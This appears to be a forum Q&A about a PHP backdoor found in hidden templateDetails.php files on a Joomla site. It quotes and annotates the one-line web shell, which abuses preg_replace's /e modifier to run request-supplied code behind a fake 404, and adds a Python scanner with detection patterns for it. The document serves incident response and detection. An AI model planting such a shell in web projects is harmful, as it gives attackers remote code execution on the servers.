I just found a lot of templateDetails.php files hidden in various folders on a Joomla site I manage, containing the following code:
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
I promptly restored the site from a backup, changed all the admin passwords and hardened the site.
Can you explain how this kind of code is used to steal from or damage a website?
Answer 0 (score: 3)
I have commented the code below to explain it to you:
<?php
//Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
header("HTTP/1.0 404 Not Found"); //If that variable doesn't exist, send a 404
// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then in theory use the result as the preg_replace (however in this case, that bit doesn't matter, as actually all we are looking to do is execute whatever has been passed through request - basically doing eval(), but hiding it so it's not as obvious, and won't get picked up (in theory) by any installs that block eval (although in practice most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>
In short, it's a fancy way of using eval() that lets them pass any code as a query string and then execute it!
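As an added, defender-side example (not code from the question or the answer above): a small Python scanner that flags the three traits of this dropper across a web root: a preg_replace pattern literal carrying the /e (eval) modifier, request data passed as the replacement argument, and the "send a 404 unless my parameter is present" cloaking. The sample strings, function names and indicator labels are my own constructions.

```python
import os
import re

# Constructed samples: the dropper quoted in the question and a harmless preg_replace call.
BACKDOOR_SAMPLE = ("<?php if (!isset($_REQUEST['e44e'])) header(\"HTTP/1.0 404 Not Found\"); "
                   "@preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>")
BENIGN_SAMPLE = "<?php echo preg_replace('/\\s+/', ' ', $_GET['q']); ?>"

# preg_replace( <quoted pattern literal> , ... ; group 2 is the literal without its quotes
PREG_CALL = re.compile(r"""preg_replace\s*\(\s*(['"])(.+?)\1\s*,""", re.DOTALL)
# request-controlled data passed as the *replacement* argument
REQUEST_REPLACEMENT = re.compile(r"""preg_replace\s*\([^,]+,\s*@?\$_(REQUEST|GET|POST|COOKIE)\b""")
# "answer 404 unless my parameter is present": the cloaking on the shell's first line
CLOAK_404 = re.compile(r"""!isset\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\[[^\]]*\]\s*\)\s*\)\s*"""
                       r"""header\s*\(\s*['"]HTTP/1\.[01]\s+404""")
CLOSING = {"(": ")", "[": "]", "{": "}", "<": ">"}  # PHP bracket-style regex delimiters

def has_e_modifier(literal: str) -> bool:
    # Modifiers follow the last closing delimiter; /e is the eval flag the answer explains.
    if not literal:
        return False
    end = literal.rfind(CLOSING.get(literal[0], literal[0]))
    return end > 0 and "e" in literal[end + 1:]

def scan_source(text: str) -> list:
    # Indicators found in one PHP source text; an empty list means nothing matched.
    findings = []
    if any(has_e_modifier(m.group(2)) for m in PREG_CALL.finditer(text)):
        findings.append("preg_replace with /e modifier")
    if REQUEST_REPLACEMENT.search(text):
        findings.append("request data used as preg_replace replacement")
    if CLOAK_404.search(text):
        findings.append("404 cloaking on missing request parameter")
    return findings

def scan_tree(root: str) -> dict:
    # Walk a document root and map every flagged .php file to its indicators.
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if name == "templateDetails.php":  # Joomla's real manifest is templateDetails.xml
                found.append("templateDetails.php is not a Joomla template file")
            if found:
                hits[path] = found
    return hits
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on a current PHP build this dropper no longer executes anything, but its presence still proves the host was written to by an attacker and the rest of the site needs the same review.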